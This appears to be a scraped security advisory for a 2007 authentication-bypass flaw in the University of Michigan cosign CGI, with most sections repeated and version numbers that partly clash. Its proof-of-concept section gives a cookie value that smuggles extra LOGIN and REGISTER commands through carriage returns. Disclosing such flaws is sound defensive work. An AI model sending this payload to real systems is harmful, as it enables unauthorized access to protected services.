Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
BID:23422
Info
Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
| Bugtraq ID: | 23422 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2007 12:00AM |
| Updated: | Apr 12 2007 03:31AM |
| Credit: | Jon Oberheide is credited with the discovery of this issue. |
| Vulnerable: |
University of Michigan cosign 2.0.1 University of Michigan cosign 2.9.4a |
| Not Vulnerable: |
University of Michigan cosign 2.9.4b University of Michigan cosign 2.0.2a |
Discussion
Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to gain unauthorized access to services hosted on an affected computer.
Versions prior to 1.9.4b and 2.0.2a are vulnerable.
The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to gain unauthorized access to services hosted on an affected computer.
Versions prior to 1.9.4b and 2.0.2a are vulnerable.
Exploit / POC
Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept cookie data is available:
cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y
Attackers can use a browser to exploit this issue.
The following proof-of-concept cookie data is available:
cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y
Solution / Fix
Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
Solution:
The vendor has released fixes to address this issue. Please see the references for more information.
University of Michigan cosign 2.9.4a
University of Michigan cosign 2.0.1
Solution:
The vendor has released fixes to address this issue. Please see the references for more information.
University of Michigan cosign 2.9.4a
-
University of Michigan cosign-1.9.4b.tar.gz
http://www.umich.edu/~umweb/downloads/cosign-1.9.4b.tar.gz
University of Michigan cosign 2.0.1
-
University of Michigan cosign-2.0.2a.tar.gz
http://www.umich.edu/~umweb/downloads/cosign-2.0.2a.tar.gz
References
Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability
References:
References:
- Cosign Homepage (University of Michigan)
- COSIGN-VULN-2007-001 Authentication bypass, remotely exploitable (University of Michigan)